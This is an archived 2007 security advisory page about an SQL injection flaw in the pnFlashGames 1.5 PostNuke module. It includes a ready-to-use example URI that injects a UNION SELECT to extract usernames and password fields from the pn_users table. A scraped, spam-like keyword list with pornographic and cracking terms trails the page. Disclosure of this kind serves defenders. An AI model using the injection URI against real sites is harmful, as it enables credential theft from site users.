about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability


Title PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
Published 2007-04-28-12:00AM
Updated 2007-04-30-09:40PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  xoron is credited with the discovery of this vulnerability.
Vulnerable  pnFlashGames pnFlashGames 1.5
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 13:22:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cuccipop Crack Data PHP Advanc sexy walpe xzero Japn CMS is Fre Searching projekt projekt www.go9188 abg indone ...t/comp 2009-12-10 SEX.IMAGES OpenSSH 3 Nudemodels 0%3F+00+0+ OpenSSH 3 www.sneha news for c Indianwome sdfvn xzero remote roo Russian se news for c www.colleg Downloadin com_media Russian se SEX.IMAGES entropysea hot transp www.tamiln news for c Xxxvideosc Xxxvideosc mom+son+se Crack Data psp.lzvw.c Movable Ty gambar por ip+board+2 CVE 2004 1 serials wi www.pk0774 www.js008. www. Sex. csdos